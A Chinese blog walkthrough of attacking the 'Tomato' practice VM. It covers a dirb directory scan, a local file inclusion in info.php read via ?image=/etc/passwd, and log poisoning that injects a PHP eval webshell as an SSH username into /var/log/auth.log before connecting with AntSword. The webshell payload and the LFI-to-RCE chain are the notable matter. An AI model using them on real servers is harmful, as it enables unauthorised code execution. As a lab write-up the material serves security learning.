TOMATO靶机漏洞复现

步骤一,我们来到tomato页面

什么也弄不了只有一番茄图片

弱口令不行,xxs也不行,xxe还是不行

我们来使用kali来操作...

步骤二,使用dirb再扫一下, dirb http://172.16.1.133

1.发现这个文件可以访问.我们来访问一下

/antibot_image/

2.我们来看看他文件里面有什么东西是我们可以利用的!

3.找到网站绝对路径 info.php我们来点击进去

4.查看页面源代码 可以发现image的文件包含.

5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞

最下边

步骤三,将一句话木马作为ssh登录的用户名登录

1.输入

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

2.页面通过image传参查看日志文件

/var/log/auth.log

这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了

发现多了一些报错信息,大概率写入木马成功.

步骤四,直接使用蚁剑进行连接:

http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log

密码:cmd

连接成功

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值